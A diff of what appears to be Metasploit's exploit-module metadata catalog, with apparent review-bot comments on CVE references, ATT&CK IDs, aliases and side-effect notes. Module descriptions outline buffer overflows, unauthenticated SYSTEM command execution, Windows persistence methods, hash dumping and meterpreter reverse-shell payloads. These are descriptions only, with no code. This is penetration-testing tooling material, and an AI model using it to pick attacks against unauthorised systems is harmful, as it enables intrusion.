"URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html",
@@ -181732,7 +183259,7 @@
"targets": [
"Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1"
],
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb",
"is_install_path": true,
"ref_name": "windows/http/umbraco_upload_aspx",
@@ -181814,7 +183341,9 @@
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [],
"references": [
"CVE-2017-13708"
],
"platform": "Windows",
"arch": "",
"rport": 80,
@@ -181836,7 +183365,7 @@
"targets": [
"VX Search Enterprise v9.5.12"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/vxsrchs_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/vxsrchs_bof",
@@ -181988,7 +183517,9 @@
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.",
"references": [],
"references": [
"CVE-2012-10062"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
@@ -182010,14 +183541,25 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb",
"is_install_path": true,
"ref_name": "windows/http/xampp_webdav_upload_php",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {},
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
@@ -183510,6 +185052,7 @@
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.",
"references": [
"CVE-2005-1758",
"OSVDB-55175"
],
"platform": "Windows",
@@ -183520,7 +185063,7 @@
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_auth.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_auth",
@@ -184156,6 +185699,7 @@
],
"description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.",
"references": [
"CVE-2011-4135",
"OSVDB-81899",
"BID-52718",
"ZDI-12-052",
@@ -184173,7 +185717,7 @@
"Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3",
"Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb",
"is_install_path": true,
"ref_name": "windows/license/flexnet_lmgrd_bof",
@@ -184306,6 +185850,7 @@
],
"description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).",
"references": [
"CVE-2013-10046",
"OSVDB-96208",
"EDB-27282"
],
@@ -184317,7 +185862,7 @@
"targets": [
"Agnitum Outpost Internet Security 8.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb",
"is_install_path": true,
"ref_name": "windows/local/agnitum_outpost_acs",
@@ -187125,7 +188670,7 @@
"msutovsky-r7 <martin_sutovsky@rapid7.com>",
"James Williams"
],
"description": "This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.",
"description": "This module exploits a bug in LINQPad up to version 5.52.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.",
"references": [
"URL-https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad",
"CVE-2024-53326"
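Review bot: the corrected description fixes the product name (LINQPad) and the affected version (5.52.00) but keeps the remaining wording problems: "in paid version of software", "The core of a bug is cache file containing deserialized data, which attacker can overwrite" would read better as "in the paid version of the software" and "The core of the bug is a cache file containing serialized data, which an attacker can overwrite". Note also that the cache contents are serialized, not deserialized; deserialization is what happens on restart. As with the other entries, the change has to be made in the module's Description so it survives the next regeneration of this file.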
@@ -187138,7 +188683,7 @@
"targets": [
"Windows"
],
"mod_time": "2025-05-06 08:43:57 +0000",
"mod_time": "2025-10-19 10:05:48 +0000",
"path": "/modules/exploits/windows/local/linqpad_deserialization_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/linqpad_deserialization_persistence",
@@ -188485,6 +190030,7 @@
],
"description": "This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.\n For this module to work, both the NSClient++ web interface and `ExternalScripts` features must be enabled.\n You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.",
"references": [
"CVE-2025-34078",
"EDB-48360",
"EDB-46802"
],
@@ -188509,7 +190055,7 @@
"targets": [
"Windows"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/local/nscp_pe.rb",
"is_install_path": true,
"ref_name": "windows/local/nscp_pe",
@@ -188690,7 +190236,9 @@
"Security-Assessment.com"
],
"description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)",
"references": [],
"references": [
"CVE-2025-34109"
],
"platform": "Windows",
"arch": "",
"rport": null,
@@ -188700,7 +190248,7 @@
"Windows x86",
"Windows x64"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/local/panda_psevents.rb",
"is_install_path": true,
"ref_name": "windows/local/panda_psevents",
@@ -188816,54 +190364,6 @@
"needs_cleanup": null,
"actions": []
},
"exploit_windows/local/persistence_image_exec_options": {
"name": "Windows Silent Process Exit Persistence",
"fullname": "exploit/windows/local/persistence_image_exec_options",
"aliases": [],
"rank": 600,
"disclosure_date": "2008-06-28",
"type": "exploit",
"author": [
"Mithun Shanbhag",
"bwatters-r7"
],
"description": "Windows allows you to set up a debug process when a process exits.\n This module uploads a payload and declares that it is the debug\n process to launch when a specified process exits.",
"references": [
"URL-https://attack.mitre.org/techniques/T1183/",
"URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
"is_install_path": true,
"ref_name": "windows/local/persistence_image_exec_options",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_windows/local/persistence_service": {
"name": "Windows Persistent Service Installer",
"fullname": "exploit/windows/local/persistence_service",
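Review bot: this hunk deletes the exploit_windows/local/persistence_image_exec_options entry outright, and no replacement entry appears in this section of the diff; please confirm that the module was moved rather than dropped and that the new entry carries "windows/local/persistence_image_exec_options" in its "aliases" array, otherwise resource scripts and automation that reference the old ref_name will stop resolving. The MITRE reference "T1183" in the removed entry is a deprecated technique ID (the current one is T1546.012), so if the entry is being re-created it is worth updating that URL at the same time.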
@@ -189273,51 +190773,6 @@
"needs_cleanup": null,
"actions": []
},
"exploit_windows/local/registry_persistence": {
"name": "Windows Registry Only Persistence",
"fullname": "exploit/windows/local/registry_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "2015-07-01",
"type": "exploit",
"author": [
"Donny Maasland <donny.maasland@fox-it.com>"
],
"description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.",
"references": [],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/local/registry_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/registry_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": null,
"actions": []
},
"exploit_windows/local/ricoh_driver_privesc": {
"name": "Ricoh Driver Privilege Escalation",
"fullname": "exploit/windows/local/ricoh_driver_privesc",
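Review bot: same concern as for the image_exec_options removal above: exploit_windows/local/registry_persistence is deleted here with no corresponding entry in this section, and this is one of the more commonly referenced persistence modules, so the successor entry needs "windows/local/registry_persistence" in its "aliases" so that `use exploit/windows/local/registry_persistence` keeps working. The removed entry had an empty "references" array and "unknown-*" notes; if the module is re-homed, that is a good moment to fill in the Notes hash rather than carrying the unknowns forward.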
@@ -190483,6 +191938,7 @@
],
"description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.",
"references": [
"CVE-2025-34127",
"CWE-121"
],
"platform": "Windows",
@@ -190493,7 +191949,7 @@
"targets": [
"Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2025-07-30 16:13:01 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/achat_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/achat_bof",
@@ -190528,6 +191984,7 @@
],
"description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).",
"references": [
"CVE-2013-10064",
"OSVDB-89944",
"BID-57789",
"EDB-24467",
@@ -190541,7 +191998,7 @@
"targets": [
"ActFax 5.01 / Windows XP SP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/actfax_raw_server_bof",
@@ -194470,6 +195927,7 @@
],
"description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.6.0.4, current at the time of module writing",
"references": [
"CVE-2023-31902",
"EDB-51010",
"URL-https://mobilemouse.com/"
],
@@ -194481,7 +195939,7 @@
"targets": [
"default"
],
"mod_time": "2022-09-27 14:51:03 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/mobile_mouse_rce",
@@ -194600,6 +196058,50 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/misc/ncr_cmcagent_rce": {
"name": "NCR Command Center Agent Remote Code Execution",
"fullname": "exploit/windows/misc/ncr_cmcagent_rce",
"aliases": [],
"rank": 300,
"disclosure_date": "2021-02-07",
"type": "exploit",
"author": [
"daffainfo (Muhammad Daffa)",
"jjcho (Jericho Nathanael Chrisnanta)"
],
"description": "CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter\n (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command\n as SYSTEM, as exploited in the wild in 2020 and/or 2021. The vendor's position is that exploitation occurs only\n on devices with a certain \"misconfiguration.\"",
"references": [
"CVE-2021-3122",
"URL-https://www.tetradefense.com/incident-response-services/active-exploit-a-remote-code-execution-rce-vulnerability-for-ncr-aloha-point-of-sale/",
"URL-https://hcs-team.com/blog/cve-2021-3122/"
],
"platform": "Windows",
"arch": "x64, x86",
"rport": 8089,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Windows"
],
"mod_time": "2025-10-30 07:43:32 +0000",
"path": "/modules/exploits/windows/misc/ncr_cmcagent_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/ncr_cmcagent_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": []
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/misc/netcat110_nt": {
"name": "Netcat v1.10 NT Stack Buffer Overflow",
"fullname": "exploit/windows/misc/netcat110_nt",
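Review bot: `"SideEffects": []` on the new `exploit_windows/misc/ncr_cmcagent_rce` entry looks wrong given the description: the module sends a `runCommand` parameter in an XML document to port 8089 and runs an arbitrary command as SYSTEM, which will leave entries in the agent's and Windows' logs and, depending on the payload, a file on disk. Declare `ioc-in-logs` and/or `artifacts-on-disk` in the module's Notes (the persistence modules elsewhere in this diff do) so users and detection engineers can see what the module leaves behind. The description also repeats the vendor's claim that only hosts with a certain "misconfiguration" are exploitable without naming the setting; if the module documentation knows which one it is, stating it would let defenders check their own exposure.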
@@ -195023,6 +196525,7 @@
],
"description": "This module utilizes the Remote Control Server's, part\n of the Remote Control Collection by Steppschuh, protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.1.1.12, current at the time of module writing",
"references": [
"CVE-2022-4978",
"URL-http://remote-control-collection.com",
"URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py"
],
@@ -195034,7 +196537,7 @@
"targets": [
"default"
],
"mod_time": "2022-10-28 15:03:39 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/remote_control_collection_rce",
@@ -195355,6 +196858,7 @@
],
"description": "This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.",
"references": [
"CVE-2011-10022",
"OSVDB-72181",
"EDB-17243"
],
@@ -195366,7 +196870,7 @@
"targets": [
"Windows XP SP2/XP3"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/splayer_content_type.rb",
"is_install_path": true,
"ref_name": "windows/misc/splayer_content_type",
@@ -195447,6 +196951,7 @@
],
"description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-20007",
"OSVDB-64582",
"BID-34141",
"EDB-8227"
@@ -195459,7 +196964,7 @@
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/talkative_response.rb",
"is_install_path": true,
"ref_name": "windows/misc/talkative_response",
@@ -195593,6 +197098,7 @@
],
"description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.",
"references": [
"CVE-2009-10006",
"OSVDB-65689",
"EDB-14013"
],
@@ -195604,7 +197110,7 @@
"targets": [
"Windows XP Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/misc/ufo_ai.rb",
"is_install_path": true,
"ref_name": "windows/misc/ufo_ai",
@@ -197837,6 +199343,212 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/persistence/image_exec_options": {
"name": "Windows Silent Process Exit Persistence",
"fullname": "exploit/windows/persistence/image_exec_options",
"aliases": [
"exploits/windows/local/persistence_image_exec_options"
],
"rank": 600,
"disclosure_date": "2008-06-28",
"type": "exploit",
"author": [
"Mithun Shanbhag",
"bwatters-r7"
],
"description": "Windows allows you to set up a debug process when a process exits.\n This module uploads a payload and declares that it is the debug\n process to launch when a specified process exits.",
"references": [
"ATT&CK-T1183",
"URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-26 15:44:31 +0000",
"path": "/modules/exploits/windows/persistence/image_exec_options.rb",
"is_install_path": true,
"ref_name": "windows/persistence/image_exec_options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_windows/persistence/registry": {
"name": "Windows Registry Only Persistence",
"fullname": "exploit/windows/persistence/registry",
"aliases": [
"exploits/windows/local/registry_persistence"
],
"rank": 600,
"disclosure_date": "2015-07-01",
"type": "exploit",
"author": [
"Donny Maasland <donny.maasland@fox-it.com>",
"h00die"
],
"description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" or \"RunOnce\" (depending on privilege and selected method).\n The payload will be installed completely in registry.",
"references": [
"ATT&CK-T1547.001",
"ATT&CK-T1112",
"URL-https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
"URL-https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-10-23 17:44:22 +0000",
"path": "/modules/exploits/windows/persistence/registry.rb",
"is_install_path": true,
"ref_name": "windows/persistence/registry",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"event-dependent",
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"config-changes",
"ioc-in-logs"
]
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": null,
"actions": []
},
"exploit_windows/persistence/startup_folder": {
"name": "Windows Persistent Startup Folder",
"fullname": "exploit/windows/persistence/startup_folder",
"aliases": [],
"rank": 600,
"disclosure_date": "1995-01-01",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module establishes persistence by creating a payload in the user or system startup folder.\n Works on Vista and newer systems.",
"references": [
"ATT&CK-T1547.001",
"URL-https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-10-29 05:18:20 +0000",
"path": "/modules/exploits/windows/persistence/startup_folder.rb",
"is_install_path": true,
"ref_name": "windows/persistence/startup_folder",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": null,
"actions": []
},
"exploit_windows/persistence/task_scheduler": {
"name": "Windows Persistent Task Scheduler",
"fullname": "exploit/windows/persistence/task_scheduler",
"aliases": [],
"rank": 600,
"disclosure_date": "1998-05-15",
"type": "exploit",
"author": [
"h00die"
],
"description": "This module establishes persistence by creating a scheduled task to run a payload.",
"references": [
"ATT&CK-T1053.005",
"URL-https://learn.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-10-29 05:22:55 +0000",
"path": "/modules/exploits/windows/persistence/task_scheduler.rb",
"is_install_path": true,
"ref_name": "windows/persistence/task_scheduler",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": null,
"actions": []
},
"exploit_windows/pop3/seattlelab_pass": {
"name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow",
"fullname": "exploit/windows/pop3/seattlelab_pass",
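Review bot: the reference `"ATT&CK-T1183"` on `exploit_windows/persistence/image_exec_options` points at a revoked technique. ATT&CK retired T1183 (Image File Execution Options Injection) and folded it into the sub-technique T1546.012 (Event Triggered Execution: Image File Execution Options Injection), so anyone mapping this metadata to detection coverage lands on a deprecated page. Suggest replacing it with `ATT&CK-T1546.012`. The other three new persistence entries in this hunk (`registry`, `startup_folder`, `task_scheduler`) carry current IDs (T1547.001, T1112, T1053.005) and need no change.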
@@ -199844,6 +201556,7 @@
],
"description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.",
"references": [
"CVE-2011-10032",
"OSVDB-75798",
"BID-49747",
"URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt",
@@ -199858,7 +201571,7 @@
"targets": [
"Windows"
],
"mod_time": "2025-06-06 12:39:33 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb",
"is_install_path": true,
"ref_name": "windows/scada/sunway_force_control_netdbsrv",
@@ -202797,6 +204510,7 @@
],
"description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.",
"references": [
"CVE-2012-10060",
"OSVDB-79689",
"URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html",
"EDB-18535"
@@ -202810,7 +204524,7 @@
"Sysax 5.53 on Win XP SP3 / Win2k3 SP0",
"Sysax 5.53 on Win2K3 SP1/SP2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb",
"is_install_path": true,
"ref_name": "windows/ssh/sysax_ssh_username",
@@ -251956,7 +253670,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-09 07:19:14 +0000",
"mod_time": "2025-09-26 06:11:40 +0000",
"path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter_reverse_tcp",
@@ -257945,7 +259659,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_bind_named_pipe",
@@ -257980,7 +259694,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_bind_tcp",
@@ -258015,7 +259729,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_http",
@@ -258050,7 +259764,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_https",
@@ -258085,7 +259799,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -258120,7 +259834,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 06:11:40 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_tcp",
@@ -264211,7 +265925,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_bind_named_pipe",
@@ -264246,7 +265960,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_bind_tcp",
@@ -264281,7 +265995,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_http",
@@ -264316,7 +266030,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_https",
@@ -264351,7 +266065,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 03:54:58 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
@@ -264386,7 +266100,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-08 10:19:25 +0000",
"mod_time": "2025-09-26 06:11:40 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_tcp",
@@ -265780,14 +267494,16 @@
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "Post module to dump the password hashes for all users on an AIX system.",
"references": [],
"references": [
"ATT&CK-T1003.008"
],
"platform": "AIX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-26 16:28:15 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/aix/hashdump.rb",
"is_install_path": true,
"ref_name": "aix/hashdump",
@@ -265860,7 +267576,8 @@
"description": "Post Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.",
"references": [
"URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
"URL-https://hashcat.net/forum/thread-2202.html"
"URL-https://hashcat.net/forum/thread-2202.html",
"ATT&CK-T1003"
],
"platform": "Android",
"arch": "",
@@ -265868,7 +267585,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-27 01:56:49 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/android/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "android/gather/hashdump",
@@ -266271,14 +267988,16 @@
"bcoles <bcoles@gmail.com>"
],
